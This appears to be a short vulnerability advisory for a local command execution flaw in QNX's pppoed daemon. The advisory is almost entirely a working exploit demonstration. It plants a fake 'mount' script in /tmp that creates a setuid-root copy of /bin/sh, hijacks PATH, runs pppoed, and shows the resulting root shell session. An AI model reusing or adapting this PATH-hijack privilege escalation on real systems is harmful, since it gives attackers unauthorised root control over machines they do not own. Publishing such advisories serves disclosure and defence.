|
|
QNX PPPoEd Path Environment Variable Local Command Execution Vulnerability
There is no exploit required, the following demonstration is available: $ cd /tmp $ cat << _EOF_ > mount #!/bin/sh cp /bin/sh /tmp/rootshell chown root /tmp/rootshell chmod 4777 /tmp/rootshell echo "Here comes your root shell" _EOF_ $ chmod 755 mount $ export PATH=/tmp:$PATH $ /usr/sbin/pppoed $ ls -la /tmp -rwxr-xr-x 1 sandimas users 88 Aug 25 2004 mount -rwsrwxrwx 1 root 100 153384 Jun 22 2001 /tmp/rootshell $ /tmp/rootshell Here comes your root shell # uname -a QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86 # |
|
Privacy Statement |